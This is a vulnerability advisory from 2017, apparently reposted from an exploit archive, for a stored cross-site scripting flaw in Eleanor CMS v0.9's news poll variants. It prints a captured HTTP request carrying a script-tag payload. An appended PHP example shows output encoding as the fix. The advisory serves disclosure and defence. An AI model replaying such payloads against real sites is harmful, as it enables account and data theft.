Eleanor CMS v0.9 Stored Cross Site Scripting

2017.08.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=============================================
ICG Laboratory
- Discovered by: 0x3a
- Date: August 21, 2017
- HomePage: Www.Iran-Cyber.net
- Vendor HomePage: Www.eleanor-cms.ru
=============================================

I. VULNERABILITY
-------------------------
Eleanor CMS v0.9 - Stored Cross Site Scripting

II. BACKGROUND
-------------------------
Eleanor CMS consumes significantly fewer resources than DLE, WordPress or Joomla CNC, with support for Russian text. Thoughtful multilanguage support lets you build a site in several languages. A flexible template system gives design fantasy free rein. Fully commented source code greatly simplifies getting familiar with the system.

III. DESCRIPTION
-------------------------
A stored XSS vulnerability has been detected in Eleanor CMS that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.

IV. PROOF OF CONCEPT
-------------------------
Create a user and log in with it. Under News, click "Add News"; in the Voting section, add a voting poll. An attacker can place arbitrary HTML/script in a poll variant.

The captured request:

POST Eleanor/news/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.2.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/Eleanor/news/add
Cookie: eluser=MTkwZmJjODQ4YmQwZjZmYmJjMWY3YTIwMWYyM2FhZWZ8Mg%3D%3D; el1-6=1; el1-4=1; elUploader-=599db3805df29
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 452

title=Pentest&uri=&tags=&announcement=Pentest&text=Pentest&show_detail=1&enddate=&status=1&voting%5B_addvoting%5D=1&voting%5Bbegin%5D=&voting%5Bend%5D=&voting%5Bagaindays%5D=10&voting%5B_questions%5D%5B0%5D%5Btitle%5D=Pentest&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B0%5D=1&voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D=<script>alert("Stored XSS By 0x3a | ICG Labrotary")&voting%5B_questions%5D%5B0%5D%5Bmaxans%5D=2&back=http%3A%2F%2F127.0.0.1%2Fnews%2Fdelete%2F9&_draft=0

The captured response:

HTTP/1.1 200 OK
Date: Wed, 23 Aug 2017 17:09:03 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15
X-Powered-By: PHP/5.6.15
Cache-Control: no-store
Content-Language: en
Content-Encoding: gzip
X-Powered-CMS: Eleanor CMS http://eleanor-cms.ru
Content-Length: 3544
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=windows-1251

The parameter voting%5B_questions%5D%5B0%5D%5Bvariants%5D%5B1%5D (decoded: voting[_questions][0][variants][1]) is not filtered, which is what makes the stored XSS possible.

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal sensitive information such as user credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Eleanor CMS v0.9

VII. SOLUTION
-------------------------
No patch released.

VIII. CREDITS
-------------------------
This vulnerability has been discovered and reported by ICG Laboratory.

IX. ABOUT ME
-------------------------
0x3a | tlg : @CloudLinux
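A defensive illustration of where the fix for section IV belongs, added here and not part of the advisory or of Eleanor CMS: the nested voting[] array that PHP builds from the bracketed field names is HTML-encoded recursively before a template renders it, using the charset the response actually declares (windows-1251) so the encoder and the browser agree on what a character is. The function name escapeTree and the sample array are constructed for this example.

```php
<?php
// Added example, not Eleanor CMS code: contextual output encoding for the
// nested voting[] structure before a template renders it as HTML.
// The advisory's response is text/html; charset=windows-1251, so the
// charset handed to htmlspecialchars() must match the output charset.
// Written without scalar type hints so it also runs on the PHP 5.6 seen
// in the response headers.

/**
 * Recursively HTML-encode every string leaf of a (possibly nested) array.
 * Array keys are left as-is here; anything key-derived is cast at output.
 */
function escapeTree($value, $charset = 'Windows-1251')
{
    if (is_array($value)) {
        $out = array();
        foreach ($value as $k => $v) {
            $out[$k] = escapeTree($v, $charset);
        }
        return $out;
    }
    // ENT_QUOTES encodes both quote styles, so the value is also safe inside
    // a quoted attribute; ENT_SUBSTITUTE replaces invalid byte sequences
    // instead of returning an empty string for the whole value.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, $charset);
}

// Constructed sample with the same shape PHP builds in $_POST['voting']
// from the bracketed field names in the advisory's request body.
$voting = array(
    '_addvoting' => '1',
    '_questions' => array(
        0 => array(
            'title'    => 'Pentest',
            'variants' => array(
                0 => '1',
                1 => '<script>alert("Stored XSS")',   // the unfiltered field
            ),
            'maxans'   => '2',
        ),
    ),
);

$safe = escapeTree($voting);

// Render from the escaped copy only: the script tag is shown as text.
foreach ($safe['_questions'] as $qi => $q) {
    echo '<h3>', $q['title'], "</h3>\n";
    foreach ($q['variants'] as $vi => $variant) {
        echo '<label><input type="radio" name="q', (int) $qi, '" value="', (int) $vi, '"> ',
             $variant, "</label>\n";
    }
}
```

The same encoding step must be applied on every render path that shows stored poll data, since the payload persists in the database and any unencoded view re-triggers it.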


Copyright 2017, cxsecurity.com